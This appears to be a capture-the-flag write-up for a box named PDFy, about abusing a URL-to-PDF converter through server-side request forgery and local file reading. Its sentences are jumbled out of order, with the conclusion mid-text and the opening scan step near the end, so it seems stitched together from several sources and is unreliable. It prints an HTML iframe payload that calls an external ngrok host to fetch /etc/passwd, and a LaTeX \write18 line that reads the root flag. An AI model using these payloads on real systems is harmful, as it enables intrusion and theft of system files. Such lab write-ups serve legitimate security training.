This revealed several open ports, with notable services including an HTTP server running on port 80 and a PDF-related service on port 8080.
The exploitation path usually pivots on identifying the specific tool generating the PDFs.
The box typically starts with a standard web server running a simple web application. The core functionality allows a user to input a URL or upload a file to generate a PDF.
We then focus our attention on the PDF converter service running on port 8080. After analyzing the service using tools like curl and burpsuite, we discover that it allows users to convert various file formats to PDF. However, we also notice that the service does not perform any validation on user-input files, which could potentially lead to code execution vulnerabilities.
Now that you've mastered PDFy, you're equipped to identify and exploit similar vulnerabilities in other environments. The next time you see a "Convert to PDF" button, you'll know exactly where to look. Happy hacking!
Once you successfully render /etc/passwd, you have confirmed the LFI/SSRF vulnerability.
Upon reading config.php, we discover potential hardcoded credentials or a path to a web shell. In this scenario, we find the application allows uploading files, which we can leverage.
4. Gaining Initial Foothold
The first step in any penetration test is to perform an initial scan of the target machine to identify open ports and services. Using Nmap, I ran a basic scan:
Visiting the website on port 80 reveals a simple webpage with a link to a PDF file.
The uploaded PDF file can be used to execute arbitrary code on the system.
<!DOCTYPE html> <html lang="en"> <body> <iframe src="http://0.tcp.us-cal-1.ngrok.io:19086/axura.php?x=/etc/passwd" style="height:1000px;width:1000px"></iframe> </body> </html>
A web application that converts provided URLs into PDF documents. Vulnerability: Insecure URL handling during PDF generation.
\write18{cat /root/root.txt}
Inside pdftex shell: